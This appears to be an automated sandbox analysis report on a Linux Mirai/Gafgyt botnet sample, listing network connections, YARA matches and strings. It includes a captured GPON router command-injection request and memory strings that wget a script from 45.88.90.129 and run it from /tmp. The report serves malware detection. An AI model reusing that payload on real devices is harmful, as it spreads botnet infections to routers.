Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32944
Source: unknown	Network traffic detected: HTTP traffic on port 52288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54408 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53800
Source: unknown	Network traffic detected: HTTP traffic on port 54838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50774
Source: unknown	Network traffic detected: HTTP traffic on port 36842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44928
Source: unknown	Network traffic detected: HTTP traffic on port 48150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40568
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59110
Source: unknown	Network traffic detected: HTTP traffic on port 44910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56086
Source: unknown	Network traffic detected: HTTP traffic on port 42666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41898
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56638 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54650 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50786
Source: unknown	Network traffic detected: HTTP traffic on port 52150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40558
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41888
Source: unknown	Network traffic detected: HTTP traffic on port 39444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56096
Source: unknown	Network traffic detected: HTTP traffic on port 45698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56092
Source: unknown	Network traffic detected: HTTP traffic on port 40306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40556
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41882
Source: unknown	Network traffic detected: HTTP traffic on port 59102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39560
Source: unknown	Network traffic detected: HTTP traffic on port 47233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59136
Source: unknown	Network traffic detected: HTTP traffic on port 40842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59132
Source: unknown	Network traffic detected: HTTP traffic on port 42396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47170
Source: unknown	Network traffic detected: HTTP traffic on port 45024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39556
Source: unknown	Network traffic detected: HTTP traffic on port 37620 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52502
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53832
Source: unknown	Network traffic detected: HTTP traffic on port 47498 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52500
Source: unknown	Network traffic detected: HTTP traffic on port 50746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50514 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35194
Source: unknown	Network traffic detected: HTTP traffic on port 36538 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38172
Source: unknown	Network traffic detected: HTTP traffic on port 41488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55508
Source: unknown	Network traffic detected: HTTP traffic on port 37164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56836
Source: unknown	Network traffic detected: HTTP traffic on port 47642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52478
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51150
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40486
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40484
Source: unknown	Network traffic detected: HTTP traffic on port 33500 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40488
Source: unknown	Network traffic detected: HTTP traffic on port 35922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38160
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39496
Source: unknown	Network traffic detected: HTTP traffic on port 38122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55510
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32852
Source: unknown	Network traffic detected: HTTP traffic on port 36698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32850
Source: unknown	Network traffic detected: HTTP traffic on port 38810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52490
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51162
Source: unknown	Network traffic detected: HTTP traffic on port 57456 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40474
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39482
Source: unknown	Network traffic detected: HTTP traffic on port 55046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36526 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53426 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60638 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40464
Source: unknown	Network traffic detected: HTTP traffic on port 33728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41794
Source: unknown	Network traffic detected: HTTP traffic on port 37278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39470
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55532
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54206
Source: unknown	Network traffic detected: HTTP traffic on port 33122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47090
Source: unknown	Network traffic detected: HTTP traffic on port 55734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51182
Source: unknown	Network traffic detected: HTTP traffic on port 57158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41788
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40454
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43562
Source: unknown	Network traffic detected: HTTP traffic on port 34240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35938
Source: unknown	Network traffic detected: HTTP traffic on port 55800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52434
Source: unknown	Network traffic detected: HTTP traffic on port 58574 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43552
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44880
Source: unknown	Network traffic detected: HTTP traffic on port 43326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43550
Source: unknown	Network traffic detected: HTTP traffic on port 55746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51118
Source: unknown	Network traffic detected: HTTP traffic on port 40012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41464 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53774
Source: unknown	Network traffic detected: HTTP traffic on port 44352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51112
Source: unknown	Network traffic detected: HTTP traffic on port 33536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35922
Source: unknown	Network traffic detected: HTTP traffic on port 41508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55594 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53438 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59086
Source: unknown	Network traffic detected: HTTP traffic on port 58692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44872
Source: unknown	Network traffic detected: HTTP traffic on port 33134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38194
Source: unknown	Network traffic detected: HTTP traffic on port 46616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32886
Source: unknown	Network traffic detected: HTTP traffic on port 37942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52458
Source: unknown	Network traffic detected: HTTP traffic on port 51004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53790
Source: unknown	Network traffic detected: HTTP traffic on port 41476 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45622 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44862
Source: unknown	Network traffic detected: HTTP traffic on port 38970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58414 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59092
Source: unknown	Network traffic detected: HTTP traffic on port 59250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35908
Source: unknown	Network traffic detected: HTTP traffic on port 52522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36502 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown	Network traffic detected: HTTP traffic on port 38090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51138
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43528
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44858
Source: unknown	Network traffic detected: HTTP traffic on port 44364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42272
Source: unknown	Network traffic detected: HTTP traffic on port 36878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42274
Source: unknown	Network traffic detected: HTTP traffic on port 37848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45300
Source: unknown	Network traffic detected: HTTP traffic on port 34404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58616
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34648
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58614
Source: unknown	Network traffic detected: HTTP traffic on port 54318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34642
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55594
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34650
Source: unknown	Network traffic detected: HTTP traffic on port 48506 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55592
Source: unknown	Network traffic detected: HTTP traffic on port 60938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60934
Source: unknown	Network traffic detected: HTTP traffic on port 55718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43596
Source: unknown	Network traffic detected: HTTP traffic on port 37660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43592
Source: unknown	Network traffic detected: HTTP traffic on port 40228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42264
Source: unknown	Network traffic detected: HTTP traffic on port 32824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54268
Source: unknown	Network traffic detected: HTTP traffic on port 50448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59954
Source: unknown	Network traffic detected: HTTP traffic on port 53962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58622
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58624
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33310

Source: unknown	TCP traffic detected without corresponding DNS query: 119.107.252.116
Source: unknown	TCP traffic detected without corresponding DNS query: 119.168.121.116
Source: unknown	TCP traffic detected without corresponding DNS query: 119.3.120.18
Source: unknown	TCP traffic detected without corresponding DNS query: 119.4.112.117
Source: unknown	TCP traffic detected without corresponding DNS query: 119.55.244.86
Source: unknown	TCP traffic detected without corresponding DNS query: 119.192.167.190
Source: unknown	TCP traffic detected without corresponding DNS query: 119.208.8.252
Source: unknown	TCP traffic detected without corresponding DNS query: 119.26.116.102
Source: unknown	TCP traffic detected without corresponding DNS query: 119.114.51.80
Source: unknown	TCP traffic detected without corresponding DNS query: 119.93.191.208
Source: unknown	TCP traffic detected without corresponding DNS query: 119.94.168.43
Source: unknown	TCP traffic detected without corresponding DNS query: 119.11.58.105
Source: unknown	TCP traffic detected without corresponding DNS query: 119.151.244.250
Source: unknown	TCP traffic detected without corresponding DNS query: 119.222.107.250
Source: unknown	TCP traffic detected without corresponding DNS query: 119.204.237.158
Source: unknown	TCP traffic detected without corresponding DNS query: 119.180.15.70
Source: unknown	TCP traffic detected without corresponding DNS query: 119.104.218.14
Source: unknown	TCP traffic detected without corresponding DNS query: 119.8.122.159
Source: unknown	TCP traffic detected without corresponding DNS query: 119.75.23.228
Source: unknown	TCP traffic detected without corresponding DNS query: 119.105.17.230
Source: unknown	TCP traffic detected without corresponding DNS query: 119.254.220.68
Source: unknown	TCP traffic detected without corresponding DNS query: 119.180.246.178
Source: unknown	TCP traffic detected without corresponding DNS query: 119.41.201.73
Source: unknown	TCP traffic detected without corresponding DNS query: 119.229.237.155
Source: unknown	TCP traffic detected without corresponding DNS query: 119.84.130.97
Source: unknown	TCP traffic detected without corresponding DNS query: 119.105.146.234
Source: unknown	TCP traffic detected without corresponding DNS query: 119.62.62.242
Source: unknown	TCP traffic detected without corresponding DNS query: 119.133.43.183
Source: unknown	TCP traffic detected without corresponding DNS query: 119.71.177.94
Source: unknown	TCP traffic detected without corresponding DNS query: 119.217.227.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.164.94.77
Source: unknown	TCP traffic detected without corresponding DNS query: 119.55.175.194
Source: unknown	TCP traffic detected without corresponding DNS query: 119.106.163.230
Source: unknown	TCP traffic detected without corresponding DNS query: 119.190.140.4
Source: unknown	TCP traffic detected without corresponding DNS query: 119.95.207.185
Source: unknown	TCP traffic detected without corresponding DNS query: 119.236.7.122
Source: unknown	TCP traffic detected without corresponding DNS query: 119.112.143.230
Source: unknown	TCP traffic detected without corresponding DNS query: 119.115.83.73
Source: unknown	TCP traffic detected without corresponding DNS query: 119.1.224.59
Source: unknown	TCP traffic detected without corresponding DNS query: 119.240.192.96
Source: unknown	TCP traffic detected without corresponding DNS query: 119.182.1.122
Source: unknown	TCP traffic detected without corresponding DNS query: 119.50.246.104
Source: unknown	TCP traffic detected without corresponding DNS query: 119.232.200.239
Source: unknown	TCP traffic detected without corresponding DNS query: 119.81.89.199
Source: unknown	TCP traffic detected without corresponding DNS query: 119.184.253.187
Source: unknown	TCP traffic detected without corresponding DNS query: 119.142.70.193
Source: unknown	TCP traffic detected without corresponding DNS query: 119.141.229.96
Source: unknown	TCP traffic detected without corresponding DNS query: 119.40.126.126
Source: unknown	TCP traffic detected without corresponding DNS query: 119.130.228.167
Source: unknown	TCP traffic detected without corresponding DNS query: 119.63.170.52

Source: Q1BPEcSFNH.elf, 6249.1.00007f2584400000.00007f258441b000.r-x.sdmp, Q1BPEcSFNH.elf, 6252.1.00007f2584400000.00007f258441b000.r-x.sdmp, Q1BPEcSFNH.elf, 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp	String found in binary or memory: http://45.88.90.129/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: Q1BPEcSFNH.elf, 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp	String found in binary or memory: http://45.88.90.129/bins/Rakitin.sh
Source: Q1BPEcSFNH.elf	String found in binary or memory: http://upx.sf.net

Source: unknown

HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 35 2e 38 38 2e 39 30 2e 31 32 39 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

System Summary

Malicious sample detected (through community Yara rule)

Source: 6252.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6252.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6249.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6249.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: Process Memory Space: Q1BPEcSFNH.elf PID: 6249, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: Q1BPEcSFNH.elf PID: 6252, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: Q1BPEcSFNH.elf PID: 6258, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown

Sample contains only a LOAD segment without any section mappings

Source: LOAD without section mappings

Program segment: 0x100000

Yara signature match

Source: 6252.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6252.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6249.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6249.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
